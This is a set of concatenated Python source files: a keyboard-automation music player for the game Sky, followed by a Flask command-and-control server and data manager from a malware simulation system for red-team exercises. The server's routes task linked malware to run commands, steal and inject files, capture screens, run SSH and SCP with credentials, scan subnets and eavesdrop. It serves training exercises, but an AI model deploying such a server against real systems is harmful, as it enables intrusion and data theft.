import os import shutil import flet as ft from flet import GridView, Container, NavigationRailDestination, Page, Text, IconButton, AppBar, colors, icons from reactive_menu import ResponsiveMenuLayout from music.automusic import mstart import multiprocessing def stop_hotkeys(): global music_proc if music_proc: music_proc.terminate() music_proc.join() music_proc = None print("Stopped music") def main(page: Page, title="Sky: Keys interactive"): page.title = title menu_button = IconButton(icons.MENU) global music_proc music_proc = None def copy_music(e): destination_folder = "music/songs/" if not os.path.exists(destination_folder): os.makedirs(destination_folder) if e.files is None: return for file in e.files: new_file_path = os.path.join(destination_folder, file.name) try: shutil.copy(file.path, new_file_path) except Exception as err: print(f"Error copying {file.path}: {err}") song = ft.Radio(value=file.name, label=file.name.replace(".txt", "").replace(".json", "")) page.controls[0].controls[1].controls[1].content.content.controls.append(song) page.update() def music_hotkeys(e): global music_proc if not music_proc: f = "music/songs/" + page.controls[0].controls[1].controls[1].content.value music_proc = multiprocessing.Process(target=mstart, args=(f,)) music_proc.start() e.control.icon = icons.PAUSE print("Started music") else: music_proc.terminate() music_proc.join() music_proc = None e.control.icon = icons.PLAY_ARROW print("Stopped music") page.update() def restart_hotkeys(e): global music_proc print(e.control.value) if music_proc: stop_hotkeys() print("Started music") f = "music/songs/" + e.control.value music_proc = multiprocessing.Process(target=mstart, args=(f,)) music_proc.start() def music_page(): music_view =ft.Column(scroll=True, expand=True) fp = ft.FilePicker(on_result=copy_music) add_btn = IconButton(icon=icons.ADD, content=Text("Add music"), on_click=lambda e: fp.pick_files(allow_multiple=True, allowed_extensions=['txt', 'json'])) music_view.controls.append(fp) music_view.controls.append(add_btn) for midi_file in os.listdir("music/songs/"): if midi_file.endswith(".txt") or midi_file.endswith(".json"): song = ft.Radio(value=midi_file, label=midi_file.replace(".txt", "").replace(".json", "")) music_view.controls.append(song) return ft.Container(content=ft.RadioGroup(content=music_view, on_change=restart_hotkeys), expand=True) def emotes_page(): grid_view = GridView( runs_count=5, max_extent=100, child_aspect_ratio=1, spacing=10, expand=True, ) for img_file in os.listdir("emotes/assets/pngs"): if img_file.endswith(".png"): img = Container( image_src=f"emotes/assets/pngs/{img_file}", width=50, height=50, ink=True, on_click=lambda e, label=img_file: open_dlg_modal(e, label), ) grid_view.controls.append(img) return grid_view def close_dlg(e, label): page.dialog.open = False print(label + " saved!") page.update() def open_dlg_modal(e, label): dlg_modal = ft.AlertDialog( title=ft.Text(label), modal=True, content=ft.Column([ft.Text("Input rows offset:"), ft.Slider(min=0, max=100, divisions=10, label="{value}%"), ft.Text("Bind a hotkey"), ft.Text("Ctrl+Shift+X")]), actions=[ ft.TextButton("Save", on_click=lambda e, label=label: close_dlg(e, label)), ], actions_alignment=ft.MainAxisAlignment.END, on_dismiss=lambda e: print("Modal dialog dismissed!"), ) page.dialog = dlg_modal dlg_modal.open = True page.update() page.window_width = 800 page.window_height = 600 page.appbar = AppBar( leading=menu_button, leading_width=40, title=Text(title), bgcolor=colors.DEEP_PURPLE_900, ) pages = [ ( NavigationRailDestination( icon=icons.FAVORITE_BORDER, selected_icon=icons.FAVORITE, label="Emotes", ), emotes_page(), ), ( NavigationRailDestination( icon=icons.LIBRARY_MUSIC_OUTLINED, selected_icon=icons.LIBRARY_MUSIC_ROUNDED, label="Music", ), music_page(), ), ] menu_layout = ResponsiveMenuLayout(page, pages) play_btn = IconButton(icon=icons.PLAY_ARROW, on_click=lambda e: music_hotkeys(e)) page.add(menu_layout) page.add(play_btn) menu_button.on_click = lambda e: menu_layout.toggle_navigation() if __name__ == "__main__": multiprocessing.freeze_support() ft.app(target=main, assets_dir="emotes/assets") stop_hotkeys()
5,595
Python
.py
144
27.972222
162
0.575297
redtardis12/Sky-Keys-interactive
8
0
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,470
automusic.py
redtardis12_Sky-Keys-interactive/music/automusic.py
import json import time import keyboard import pydirectinput import codecs import pygetwindow as gw import chardet def convert_to_utf8(input_file, output_file): """ Convert a JSON file from any encoding to UTF-8. Args: input_file (str): Path to the input JSON file. output_file (str): Path to the output JSON file. """ with open(input_file, 'rb') as file: raw_data = file.read() detected_encoding = chardet.detect(raw_data)['encoding'] if detected_encoding == 'UTF-8': return decoded_data = raw_data.decode(detected_encoding) json_data = json.loads(decoded_data) with open(output_file, 'w', encoding='utf-8') as file: json.dump(json_data, file, ensure_ascii=False, indent=4) class MusicHandler: exitProgram = False pauseProgram = False data = None def __init__(self, file_path): self.file_path = file_path self.data = self.read_json_file(file_path) notes = self.data[0]['songNotes'] bpm = self.data[0]['bpm'] self.start_key, self.stop_key = self.get_hotkeys() keyboard.add_hotkey(self.stop_key, lambda: self.pause()) while not self.exitProgram: keyboard.wait(self.start_key) self.pauseProgram = False time.sleep(2) if gw.getActiveWindowTitle() == 'Sky': self.simulate_keyboard_presses(notes, bpm) def get_hotkeys(self): with open('config.json', 'r') as file: config = json.load(file) return config["music"]["start_key"], config["music"]["stop_key"] def read_json_file(self, file_path): convert_to_utf8(self.file_path, self.file_path) with codecs.open(file_path, 'r', 'utf-8', 'ignore') as file: try: return json.load(file) except json.JSONDecodeError: raise ValueError(f"Invalid JSON file: {file_path}. Probably wrong encoding, please make sure that your file is in UTF-8.") def quit(self): self.exitProgram=True def pause(self): self.pauseProgram = True def simulate_keyboard_presses(self, notes, bpm): hold_time = 0.05 # Define a simple mapping of numbers to keyboard keys. with open('config.json', 'r') as file: config = json.load(file) key_mapping = config["music"]["key_mapping"] notes_dict = {} for note in notes: if note['time'] in notes_dict: notes_dict[note['time']].append(key_mapping.get(note['key'][4:])) else: notes_dict[note['time']] = [key_mapping.get(note['key'][4:])] notes = list(notes_dict.items()) beat_interval = 60 / bpm # Seconds per beat last_time_ms = 0 pydirectinput.PAUSE=None for note in notes: if self.pauseProgram: break current_time_ms = note[0] if last_time_ms != 0: time_delay = (current_time_ms - last_time_ms) / 1000.0 else: time_delay = current_time_ms / 1000.0 time.sleep(time_delay * beat_interval) key_to_press = note[1] if key_to_press: pydirectinput.hotkey(*key_to_press, wait=hold_time) print(f"Pressed {key_to_press} at time {current_time_ms}") last_time_ms = current_time_ms def mstart(file): ms = MusicHandler(file)
3,506
Python
.py
86
31.116279
138
0.598395
redtardis12/Sky-Keys-interactive
8
0
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,471
c2App.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/ninjaC2Hub/c2App.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: c2App.py [python3] # # Purpose: This module is used as a malicious action program / malware command # and control emulator for red team to monitor & control all the linked # malwares to carry out cyberattacks on their chosen targets. # # Author: Yuancheng Liu # # Created: 2022/08/13 # version: v0.2.2 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Design Purpose: We want to design a C2 malware management system which can be applyed for the cyber execise used by red team: - CIDEX2022 - LS2023 - XS2023 All the malicious action program / malware will report C2 via http / https, it will provide the web interface or API for red team users / program to do the control of the linked malwares. For automated executing the malware action timeline, if you don't want to hard code the timeline in the malware, you can : 1. Set the malware task config json file and upload to C2, then the C2 will auto-assign the tasks to the malware. 2. Use one User Emulator to simulate a hacker's attack time line action by calling the related C2's API to dynamically control the related malware. Reference: - User Emulator: https://github.com/LiuYuancheng/Windows_User_Simulator - CSS lib [bootstrap]: https://www.w3schools.com/bootstrap4/default.asp - https://www.w3schools.com/howto/howto_css_form_on_image.asp """ import os from datetime import timedelta, datetime from flask import Flask, \ request, \ flash, render_template, send_from_directory, url_for, redirect, jsonify from werkzeug.utils import secure_filename from flask_socketio import SocketIO, emit import c2HubGlobal as gv import c2DataManager import c2Constants import c2MwUtils # log the connected peer's ssl key if use https mode and the record flg both set True. if gv.ghttpsFlg and gv.gRcdSSLFlg: gv.gDebugPrint("C2 App SSLKEYLOG mode : %s, log SSL key." %str(gv.gRcdSSLFlg), logType=gv.LOG_INFO) # If pip install sslkeylog problem, refer to below link: # https://stackoverflow.com/questions/74393847/how-to-solve-python-pip-install-sslkeylog-error-microsoft-visual-c-14-0-or import sslkeylog sshlogFilePath = os.path.join(gv.SSLKEYLOG_FOLDER, 'ssh_keylog_%s.log' %str(datetime.now().strftime('%Y_%m_%d_%H_%M_%S'))) sslkeylog.set_keylog(sshlogFilePath) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def InitDataMgr(): gv.iDataMgr = c2DataManager.DataManager(None) gv.gDebugPrint("C2 App Test mode : %s " %str(gv.gTestMd), logType=gv.LOG_INFO) if gv.gTestMd: gv.iDataMgr.addMalware('testMalware0', '127.0.0.1', taskList=[{ 'taskID': 0, 'taskType': c2MwUtils.TSK_TYEP_RIG, 'startT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'exePreT': 0, 'state': c2MwUtils.TASK_F_FLG, 'taskData': None}]) # Check the file storage folder. if not os.path.isdir(gv.UPLOAD_FOLDER): os.mkdir(gv.UPLOAD_FOLDER) if not os.path.isdir(gv.DOWNLOAD_FOLDER): os.mkdir(gv.DOWNLOAD_FOLDER) def getC2FilesList(): return os.listdir(app.config['DOWNLOAD_FOLDER']) #----------------------------------------------------------------------------- # Init the flask web app program. def createApp(): """ Create the flask App and init the app config parameters.""" app = Flask(__name__) app.config['SECRET_KEY'] = gv.APP_SEC_KEY app.config['REMEMBER_COOKIE_DURATION'] = timedelta(seconds=gv.COOKIE_TIME) app.config['UPLOAD_FOLDER'] = gv.UPLOAD_FOLDER app.config['DOWNLOAD_FOLDER'] = gv.DOWNLOAD_FOLDER # limit the max upload file size to 16MB app.config['MAX_CONTENT_LENGTH'] = 16 * 1000 * 1000 return app #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- InitDataMgr() app = createApp() async_mode = None # Socket IO async mode off socketio = SocketIO(app, async_mode=async_mode) gv.iSocketIO = socketio #----------------------------------------------------------------------------- # defind all the web request handling functions. @app.route('/') def index(): posts = {'page': 0} return render_template('index.html', posts=posts) #----------------------------------------------------------------------------- @app.route('/malwaremgmt') def malwaremgmt(): malwaresSum = gv.iDataMgr.getMalwaresInfo() gv.gDebugPrint("Receive the peer Info %s" %str(malwaresSum), logType=gv.LOG_INFO) fileList = getC2FilesList() posts = {'page': 1, 'malwareInfo': malwaresSum} return render_template('malwaremgmt.html', posts=posts, files=fileList) #----------------------------------------------------------------------------- @app.route('/<int:postID>') def peerstate(postID): peerInfoDict = gv.iDataMgr.buildPeerInfoDict(postID) fileList = getC2FilesList() return render_template('peerstate.html',posts=peerInfoDict, files=fileList) #----------------------------------------------------------------------------- # defind all the HTTP GET/POST API. @app.route('/fileupload', methods = ['POST', 'GET']) def fileupload(): """ Handle program file upload POST request. API call example: requests.post(http://<ip>:<port>/fileupload, files= {'file': (<filename>, fh.read())}) """ uploadRst = {'uploaded': False, 'errorcode': 0} if request.method == 'POST': if 'file' in request.files: fileObj = request.files['file'] if fileObj.filename: gv.gDebugPrint("File %s is uploaded via POST API." %str(fileObj.filename), logType=gv.LOG_INFO) filename = secure_filename(fileObj.filename) fileObj.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) uploadRst['uploaded'] = True return jsonify(uploadRst) else: uploadRst['errorcode'] = 1 gv.gDebugPrint("Upload filename missing, filename:%s" %str(fileObj.filename), logType=gv.LOG_INFO) uploadRst['errorcode'] = 2 return jsonify(uploadRst) #----------------------------------------------------------------------------- @app.route('/webfileupload', methods = ['POST',]) def webfileupload(): """ Handle file upload from web UI.""" result = fileupload() flash('File uploaded', 'info') return redirect(url_for('malwaremgmt')) #----------------------------------------------------------------------------- @app.route('/filedownload', methods = ['POST', 'GET']) def filedownload(): """ Handle program file download GET request. API call example: requests.get(http://<ip>:<port>/filedownload, json={"filename": filename}, allow_redirects=True) """ if request.method == 'GET': content = request.json filename = content['filename'] filePath = os.path.join(app.config["DOWNLOAD_FOLDER"], filename) if filename and os.path.exists(filePath): gv.gDebugPrint(" File %s is downlaod via API." %str(filePath), logType=gv.LOG_INFO) return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename) else: gv.gDebugPrint("Download file not exist %s" %str(filePath), logType=gv.LOG_INFO) return "File not exist", 400 # return 400 bad request error. #----------------------------------------------------------------------------- @app.route('/webfiledownload', methods = ['POST','GET']) def webfiledownload(): """ Handle file download request from web UI. API call example: requests.get(http://<ip>:<port>/webfiledownload/<filename>, allow_redirects=True) """ filename = request.form.get("downloadfilename") filePath = os.path.join(app.config["DOWNLOAD_FOLDER"], filename) if filename and os.path.exists(filePath): gv.gDebugPrint(" File %s is downlaod via API." %str(filePath), logType=gv.LOG_INFO) flash('File downloaded', 'info') return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename) return redirect(url_for('malwaremgmt')) #----------------------------------------------------------------------------- @app.route('/dataPost/<string:peerName>', methods=('POST',)) def dataPost(peerName): """ Handle program data submittion request. API call example: requests.post(http://%s:%s/dataPost/<peerID>, json={}) """ content = request.json gv.gDebugPrint("Get raw data from %s " %str(peerName), logType=gv.LOG_INFO) gv.gDebugPrint("Raw Data: %s" % str(content),prt=True, logType=gv.LOG_INFO) result = gv.iDataMgr.handleRequest(content) if gv.iDataMgr else {"ok": True} return jsonify(result) #----------------------------------------------------------------------------- @app.route('/taskPost', methods=['POST', ]) def taskPost(): """ Handle add task to specific malware via http POST API. API call example : requests.post(http://%s:%s/taskPost, json={'id':<malwareID>, ...}) """ content = request.json gv.gDebugPrint("Raw Data: %s" % str(content),prt=True, logType=gv.LOG_INFO) if content: content = dict(content) mwId = str(content['id']) #rst = gv.iDataMgr.addTaskToMalware(idx, content) rst = gv.iDataMgr.addTaskToRcdDict(mwId, content) gv.gDebugPrint("API add task result : %s " %str(rst)) return jsonify({"taskPost": rst}) #----------------------------------------------------------------------------- @app.route('/getLastRst', methods=['GET', ]) def getLastRst(): """ Handle get the malware last task result request vai http GET API. API call example : requests.get(http://%s:%s/getLastRst, json={'id':<malwareID>}) """ content = request.json gv.gDebugPrint("Raw Data: %s" % str(content),prt=True, logType=gv.LOG_INFO) if content: content = dict(content) mwId = str(content['id']) rst = gv.iDataMgr.getMwLastTaskRst(mwId) return jsonify({"taskRst": rst['taskData']}) #----------------------------------------------------------------------------- @app.route('/addcommand', methods=['POST', ]) def addcommand(): """ Handle assign run command task to malware task config from web UI. """ idx = int(request.form['malwareidx']) taskJson = { 'taskType': c2Constants.TSK_TYPE_CMD, 'taskData': [request.form['commandstr']] } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Web-UI Add cmd task result : %s " %str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addfilecopy', methods=['POST', ]) def addfilecopy(): """ Handle steal file from victim task to malware task config from web UI. """ idx = int(request.form['malwareidx']) taskJson = { 'taskType': c2Constants.TSK_TYPE_UPLOAD, 'taskData': [request.form['filepath']] } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Web-UI Add upload task result : %s " %str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addfileinject', methods=['POST', ]) def addfileinject(): """ Handle inject file to victim task to malware task config from web UI. """ idx = int(request.form['malwareidx']) filename = request.form.get("downloadfilename") filePath = os.path.join(app.config["DOWNLOAD_FOLDER"], filename) if filename and os.path.exists(filePath): taskJson = { 'taskType': c2Constants.TSK_TYPE_DOWNLOAD, 'taskData': [filename] } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Web-UI Add file inject task result : %s " %str(rst)) else: gv.gDebugPrint("File not found : %s " %str(filePath)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addcapturescreen', methods=['POST', ]) def addcapturescreen(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_SCREENST taskJson = { 'taskType': taskType, 'taskData': 'None' } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim screen shot assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addsshrun', methods=['POST', ]) def addsshrun(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_SSH tgtIP = request.form.get("tgtIP") tgtUser = request.form.get("tgtUser") tgtPwd = request.form.get("tgtPwd") tgtCmd = request.form.get("tgtCmd") taskJson = { 'taskType': taskType, 'repeat': 1, 'taskData': ';'.join((str(tgtIP), str(tgtUser), str(tgtPwd), str(tgtCmd))) } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim ssh run assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addscpfile', methods=['POST', ]) def addscpfile(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_SCP tgtIP = request.form.get("tgtIP") tgtUser = request.form.get("tgtUser") tgtPwd = request.form.get("tgtPwd") tgtfile = request.form.get("tgtFile") taskJson = { 'taskType': taskType, 'repeat': 1, 'taskData': ';'.join((str(tgtIP), str(tgtUser), str(tgtPwd), str(tgtfile))) } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim scp file assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addscansubnet', methods=['POST', ]) def addscansubnet(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_SCANNET subnetStr = request.form.get("subnetStr") taskJson = { 'taskType': taskType, 'taskData': str(subnetStr) } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim screen shot assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addkeyboardevent', methods=['POST', ]) def addkeyboardevent(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_KEYBD funcType = request.form.get("funcType") paramter = request.form.get("paramter") taskJson = { 'taskType': taskType, 'taskData': ';'.join((str(funcType), str(paramter))) } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim screen shot assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addeavesdrop', methods=['POST', ]) def addeavesdrop(): idx = int(request.form['malwareidx']) taskType = c2Constants.TSK_TYPE_EAVESDP nicName = request.form.get("nicName") interface = request.form.get("interface") timeInt = request.form.get("timeInt") taskJson = { 'taskType': taskType, 'taskData': ';'.join((str(nicName), str(interface), str(timeInt))) } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Victim screen shot assign task result : %s " % str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- @app.route('/addspecialtask', methods=['POST',]) def addspecialtask(): """ Handle add special task from web UI. """ idx = int(request.form['malwareidx']) taskType = request.form.get("tasktype") repeat = request.form.get("repeat") taskdata = request.form.get("taskdata") taskJson = { 'taskType': taskType, 'repeat': int(repeat), 'taskData': taskdata } rst = gv.iDataMgr.addTaskToMalware(idx, taskJson) gv.gDebugPrint("Web-UI Add spical task result : %s " %str(rst)) return redirect(url_for('peerstate', postID=idx)) #----------------------------------------------------------------------------- # socketIO communication handling functions. @socketio.event def connect(): print("One client connected") #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- if __name__ == '__main__': app.run(host=gv.gflaskHost, port=gv.gflaskPort, debug=gv.gflaskDebug, threaded=gv.gflaskMultiTH, ssl_context=gv.ghttpsCertsInfo)
17,646
Python
.py
373
41.434316
125
0.569805
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,472
c2DataManager.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/ninjaC2Hub/c2DataManager.py
#----------------------------------------------------------------------------- # Name: c2DataManager.py # # Purpose: Data manager class used to manage all the linked program process # the data submitted from the malware. # # Author: Yuancheng Liu # # Version: v_0.2.2 # Created: 2023/01/11 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- from collections import OrderedDict import c2HubGlobal as gv import c2MwUtils # Import all the task state flag from c2Constants import TASK_P_FLG, TASK_F_FLG, TASK_A_FLG, TASK_E_FLG, TASK_R_FLG # Import the action constents from c2Constants import ACT_KEY, ACT_GET_TASK, ACT_ACCEPT_FLG, ACT_REJECT_FLG # Import the task type from c2Constants import TSK_TYEP_RIG, TSK_TYPE_RPT, TSK_TYPE_UPLOAD, TSK_TYPE_DOWNLOAD, TSK_TYPE_CMD SCH_ID_PREFIX = 'Emu' #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class DataManager(object): """ The data manager is the module contents all the malware record obj and control all the data display on the web. """ def __init__(self, parent) -> None: self.parent = parent self.idCount = 0 # malware data record dict. self.malwareRcdDict = OrderedDict() #----------------------------------------------------------------------------- def addMalware(self, malwareID, ipaddres, taskList=[]): """ Add a new malware record in the list.""" if str(malwareID) in self.malwareRcdDict.keys(): gv.gDebugPrint("Malware ID: %s is already in record" %str(malwareID), prt=True, logType=gv.LOG_INFO) self.malwareRcdDict[malwareID].updateRegisterT() return False else: self.malwareRcdDict[str(malwareID)] = c2MwUtils.mwServerRcd(self.idCount, malwareID, ipaddres, taskList=taskList) self.idCount += 1 gv.gDebugPrint("Added Malware ID: %s in data manager." %str(malwareID), prt=True, logType=gv.LOG_INFO) self.broadcast2SioClients('pagerefersh', {'data': 'malwaremgmt'}) return True #----------------------------------------------------------------------------- def addTaskToMalware(self, malwareIdx, taskJson): """ Add a new task to the malware assignment task queue Args: malwareIdx (int): malware idx in the manager. taskJson (dict): task json exmaple: { 'taskType': c2Constants.TSK_TYPE_DOWNLOAD 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : c2Constants.TASK_A_FLG, 'taskData': ['2023-12-13_100327.png','NCL_SGX Service.docx'] } """ malwareIdx = int(malwareIdx) malwareIdList = list(self.malwareRcdDict.keys()) if 0 <= malwareIdx <= len(malwareIdList): malwareID = malwareIdList[malwareIdx] return self.addTaskToRcdDict(malwareID, taskJson) else: return False #----------------------------------------------------------------------------- def addTaskToRcdDict(self, malwareID, taskJson): """ Add a new task to malware based on the malware ID. Args: malwareID (str): malware's unique ID. taskJson (dict): refer to function <addTaskToMalware> input para taskJson. Returns: _type_: _description_ """ if malwareID in self.malwareRcdDict.keys(): return self.malwareRcdDict[malwareID].addNewTask(taskJson) else: gv.gDebugPrint("Malware ID: %s not exist." %str(malwareID), prt=True, logType=gv.LOG_INFO) return False #----------------------------------------------------------------------------- def getMwLastTaskRst(self, malwareID): """ Return the malware's last taks execution reuslt. Args: malwareID (str): malware's unique ID. """ if malwareID in self.malwareRcdDict.keys(): return self.malwareRcdDict[malwareID].getLastTaskRst() else: gv.gDebugPrint("Malware ID: %s not exist." %str(malwareID), prt=True, logType=gv.LOG_INFO) return None #----------------------------------------------------------------------------- def buildPeerInfoDict(self, peerIdx): """ Build the peer all information dictionary based on the input peer index. Args: peerId (int): malware index in data manager. Returns: None - if the malware idx is not exist peerInfoDict = { "idx" : peerIdx, "name" : peerId, "connected" : recordData['connected'], "updateT" : recordData['updateT'], "tasks" : tasksData, } """ peerIdx = int(peerIdx) if peerIdx >= len(self.malwareRcdDict.keys()): return None peerId = list(self.malwareRcdDict.keys())[peerIdx] recordObj = self.malwareRcdDict[peerId] recordData = recordObj.getRcdInfo() tasksData = recordObj.getTaskList() lastTaskRst = recordObj.getLastTaskRst() peerInfoDict = { "idx" : peerIdx, "name" : peerId, "connected" : recordData['connected'], "updateT" : recordData['updateT'], "tasks" : tasksData, "result" : lastTaskRst, } return peerInfoDict #----------------------------------------------------------------------------- def handleRequest(self, reqDict): """ Handle all the GET/POST requests data flask-app got.""" reqDict = dict(reqDict) id = reqDict['id'] data = reqDict['data'] # malware register request if reqDict[ACT_KEY] == TSK_TYEP_RIG: ipaddr = data['ipaddr'] taskList = data['tasks'] self.addMalware(id, ipaddr, taskList=taskList) return {ACT_KEY: TSK_TYEP_RIG,'state': TASK_F_FLG} # file upload request elif reqDict['action'] == TSK_TYPE_UPLOAD: # send the upload file request accept flag return {TSK_TYPE_UPLOAD: ACT_ACCEPT_FLG} # file download request elif reqDict['action'] == TSK_TYPE_DOWNLOAD: return { TSK_TYPE_DOWNLOAD: ACT_ACCEPT_FLG} # state report request elif reqDict['action'] == TSK_TYPE_RPT: self.updateTaskState(id, data) return { TSK_TYPE_RPT: ACT_ACCEPT_FLG} # malware task fetch request elif reqDict['action'] == ACT_GET_TASK: if id in self.malwareRcdDict.keys(): mvObj = self.malwareRcdDict[id] taskList = mvObj.getTaskList(taskState=TASK_P_FLG) if len(taskList) > 0: task = taskList[0] tskId = task['taskID'] rst = mvObj.setTaskState(tskId, state=TASK_A_FLG) if rst : self.broadcast2SioClients('pagerefersh', {'data': 'peerstate', 'malwareID':id}) return {'task': task} return None else: return None #----------------------------------------------------------------------------- def getMalwaresInfo(self, malwareIDList=None): """ Return a list of malware summary information.""" if malwareIDList is None: malwareIDList = self.malwareRcdDict.keys() return [self.getMalwareDetail(pName) for pName in malwareIDList] def getMalwareDetail(self, peerName): if peerName in self.malwareRcdDict.keys(): return self.malwareRcdDict[peerName].getRcdInfo() return {} def updateTaskState(self, malId, reportInfo): if malId in self.malwareRcdDict.keys(): self.malwareRcdDict[malId].updateTaskRcd(reportInfo) self.broadcast2SioClients('pagerefersh', {'data': 'peerstate', 'malwareID':malId}) #----------------------------------------------------------------------------- def broadcast2SioClients(self, msgTag, dataJson): """ Broadcast the control data Json to all the connected socketIO client.""" if gv.iSocketIO: try: gv.iSocketIO.emit(str(msgTag), dict(dataJson)) return True except Exception as err: gv.gDebugPrint("Sio broadcast Error: %s" %str(err)) return False
8,982
Python
.py
190
36.105263
108
0.518316
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,473
c2HubGlobal.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/ninjaC2Hub/c2HubGlobal.py
#----------------------------------------------------------------------------- # Name: c2HubGlobal.py # # Purpose: This module is used as a local config file to set constants, # global parameters which will be used in the other modules. # # Author: Yuancheng Liu # # Created: 2022/08/26 # version: v0.2.2 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ For good coding practice, follow the following naming convention: 1) Global variables should be defined with initial character 'g' 2) Global instances should be defined with initial character 'i' 2) Global CONSTANTS should be defined with UPPER_CASE letters """ import os import sys print("Current working directory is : %s" % os.getcwd()) dirpath = os.path.dirname(os.path.abspath(__file__)) print("Current source code location : %s" % dirpath) APP_NAME = ('c2_Monitor_Hub', 'frontend') TOPDIR = 'src' LIBDIR = 'lib' idx = dirpath.find(TOPDIR) gTopDir = dirpath[:idx + len(TOPDIR)] if idx != -1 else dirpath # found it - truncate right after TOPDIR # Config the lib folder gLibDir = os.path.join(gTopDir, LIBDIR) if os.path.exists(gLibDir): sys.path.insert(0, gLibDir) import Log Log.initLogger(gTopDir, 'Logs', APP_NAME[0], APP_NAME[1], historyCnt=100, fPutLogsUnderDate=True) #----------------------------------------------------------------------------- # load the config file. import ConfigLoader CONFIG_FILE_NAME = 'c2Config.txt' gGonfigPath = os.path.join(dirpath, CONFIG_FILE_NAME) iConfigLoader = ConfigLoader.ConfigLoader(gGonfigPath, mode='r') if iConfigLoader is None: print("Error: The config file %s is not exist.Program exit!" %str(gGonfigPath)) exit() CONFIG_DICT = iConfigLoader.getJson() #----------------------------------------------------------------------------- # Init the logger import Log Log.initLogger(gTopDir, 'Logs', APP_NAME[0], APP_NAME[1], historyCnt=100, fPutLogsUnderDate=True) # Init the log type parameters. DEBUG_FLG = False LOG_INFO = 0 LOG_WARN = 1 LOG_ERR = 2 LOG_EXCEPT = 3 def gDebugPrint(msg, prt=True, logType=None): if prt: print(msg) if logType == LOG_WARN: Log.warning(msg) elif logType == LOG_ERR: Log.error(msg) elif logType == LOG_EXCEPT: Log.exception(msg) elif logType == LOG_INFO or DEBUG_FLG: Log.info(msg) #------<CONSTANTS>------------------------------------------------------------- # Int Web page constants: RC_TIME_OUT = 10 # reconnection time out. APP_SEC_KEY = 'secrete-key-goes-here' UPDATE_PERIODIC = 15 COOKIE_TIME = 30 #UPLOAD_FOLDER = os.path.join(dirpath, 'uploadFolder') UPLOAD_FOLDER = os.path.join(dirpath, CONFIG_DICT['UPLOAD_FOLDER']) #DOWNLOAD_FOLDER = os.path.join(dirpath, 'downloadFolder') DOWNLOAD_FOLDER = os.path.join(dirpath, CONFIG_DICT['DOWNLOAD_FOLDER']) SSLKEYLOG_FOLDER = os.path.join(dirpath, CONFIG_DICT['SSLKEYLOG_FOLDER']) #-------<GLOBAL VARIABLES (start with "g")>------------------------------------- gTestMd = CONFIG_DICT['TEST_MD'] # Flask App parameters : gflaskHost = 'localhost' if gTestMd else '0.0.0.0' gflaskPort = int(CONFIG_DICT['FLASK_SER_PORT']) if 'FLASK_SER_PORT' in CONFIG_DICT.keys() else 5000 gflaskDebug = CONFIG_DICT['FLASK_DEBUG_MD'] gflaskMultiTH = CONFIG_DICT['FLASK_MULTI_TH'] # Whether create normal http host or https host: ghttpsFlg = CONFIG_DICT['HTTPS'] if 'HTTPS' in CONFIG_DICT.keys() else False ghttpsCertsInfo = None # tuple to save the ssl cert path and key path. gRcdSSLFlg = CONFIG_DICT['RCD_SSL'] if 'RCD_SSL' in CONFIG_DICT.keys() else False if ghttpsFlg: httpCertDir= os.path.join(dirpath, CONFIG_DICT['CERT_DIR']) certPath = os.path.join(httpCertDir, CONFIG_DICT['CERT_FILE'] 